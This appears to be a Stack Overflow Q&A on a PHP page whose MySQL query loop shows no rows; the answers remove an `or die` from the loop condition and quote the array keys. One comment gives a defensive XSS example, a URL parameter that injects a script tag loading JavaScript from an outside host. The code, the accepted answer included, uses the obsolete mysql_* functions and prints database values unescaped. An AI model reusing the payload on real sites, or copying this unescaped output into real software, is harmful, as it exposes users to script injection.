# php query cant figure out the problem

Tags: php, sql, mysql

I dont get an error but it does not return me the row values as well.
How can I address the problem?

```
<?php 

    //DATABASE
    $dbConn     =   mysql_connect($host,$username,$password);
    mysql_select_db($database,$dbConn);

    $SQL =  mysql_query("SELECT N.*, C.CatID FROM News N INNER JOIN Categories C ON N.CatID = C.CatID WHERE N.Active = 1 ORDER BY DateEntered DESC");


    while ( $Result = mysql_fetch_array($SQL) or die(mysql_error())) {
    $CatID[] = $Result[CatID];
    $NewsName[] = $Result[NewsName];
    $NewsShortDesc[] = $Result[NewsShortDesc];
    }

//  mysql_free_result($Result);


?>
                <div class="toparticle">
                    <span class="section"><?=$CatID[0] ?> </span>
                    <span class="headline"><?=$NewsName[0] ?></span>
                    <p><?=$NewsShortDesc[0] ?></p>
                </div>
```

Comment: not to ask too obvious of a question, but does it return rows in Workbench?

Comment: Or phpMyAdmin?  Also, you have some problems with your code.  Firstly, you really must put quotes around array indices.  For example, it should be `$Result['CatID']`, instead of `$Result[CatID]`.  Secondly, don't use `<?=`, always use `<?php echo`.  Also, you know that this code will only output one row, right?

Comment: You should probably initialize your arrays. Otherwise, if you have `register_globals` on, you could open yourself up to an XSS vulnerability. (example: add this to the end of the URL: `?CatID[]=<script src="http://ha.ckers.org/xss.js"></script>`)

Comment: @icktoofay or how about just make sure register_globals is off... as it always should be.

Comment: @dqhendricks: Yes, I know it should always be off, but I was assuming that this code might be running on multiple servers with potentially undefined configuration.

Comment: @icktoofay you can use .htaccess file in your root to turn off register_globals. An example .htaccess entry: php_flag register_globals off.

Comment: @dqhendricks: 1. Some people don't use Apache. 2. Some [bad] shared hosts do use Apache, but disable `.htaccess` files. 3. I'm guessing that `php_flag` could be turned off somehow, probably again by not-so-great shared hosts.

Comment: @icktoofay fair enough. have a feeling this wont be a distributed app however.

Answer (score 0, accepted):

Let's do this properly
If you are not using the array for any reason other than temporarily storing to loop through for display, you can just put the display code into the while loop directly.

```
<?php 
    //DATABASE
    $dbConn     =   mysql_connect($host,$username,$password);
    mysql_select_db($database,$dbConn);

    $SQL =  mysql_query("SELECT N.*, C.CatID FROM News N INNER JOIN Categories C ON N.CatID = C.CatID WHERE N.Active = 1 ORDER BY DateEntered DESC");

    while ( $Result = mysql_fetch_array($SQL) ) {
?>
                <div class="toparticle">
                    <span class="section"><?= $Result['CatID'] ?></span>
                    <span class="headline"><?= $Result['NewsName'] ?></span>
                    <p><?= $Result['NewsShortDesc'] ?></p>
                </div>
<?php
    }
    //mysql_free_result($Result);
?>
```

Comment: this is great. I have one question; what if the table has no values entered yet. Would it prompt an error?

Answer (score 1):

```
$Result[CatID];
```

needs to be

```
$Result['CatID'];
```

and

```
while ( $Result = mysql_fetch_array($SQL) or die(mysql_error())) {
```

needs to be

```
while ( $Result = mysql_fetch_array($SQL)) {
```